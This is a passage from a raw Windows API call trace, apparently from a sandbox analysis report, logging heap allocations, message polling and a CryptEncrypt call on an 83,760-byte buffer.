hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0241.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0241.577] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0241.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0241.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0241.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0241.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0241.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0241.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0241.577] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0241.578] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0241.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0241.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1472a) returned 0x2f14818 [0241.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0241.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55068 [0241.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0241.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0241.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55088 [0241.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0241.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0241.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0241.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0241.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0241.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0241.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0241.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1472a) returned 0x2e80330 [0241.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0241.605] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.605] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.606] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0241.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0241.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.606] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0241.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0241.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.607] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0241.607] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0241.607] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.607] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0241.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0241.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.607] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0241.607] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0241.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0241.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0241.607] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.608] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.608] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0241.608] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.608] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0241.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.608] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0241.610] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0241.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e513a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0241.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0241.610] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0241.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0241.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.611] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1472a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x14730) returned 1 [0241.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0241.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0241.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0241.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0241.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0241.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0241.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0241.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0241.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0241.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0241.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0241.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0241.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0241.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0241.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0241.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0241.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0241.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0241.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0241.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0241.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0241.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0241.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0241.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0241.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0241.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0241.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0241.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0241.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0241.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0241.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0241.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0241.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0241.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0241.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0241.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0241.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0241.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0241.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0241.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0241.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0241.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0241.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0241.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0241.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0241.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0241.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0241.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0241.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0241.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0241.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0241.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0241.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0241.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0241.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0241.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0241.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0241.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0241.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0241.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0241.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0241.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0241.702] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0241.703] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.703] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0241.703] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0241.704] CharLowerBuffW (in: lpsz="byte[83760]", cchLength=0xb | out: lpsz="byte[83760]") returned 0xb [0241.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0241.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0241.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0241.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0241.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0241.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0241.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0241.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0241.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0241.704] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0241.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0241.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0241.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0241.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0241.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0241.709] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0241.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0241.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0241.709] RtlAllocateHeap (HeapHandle=0x970000, 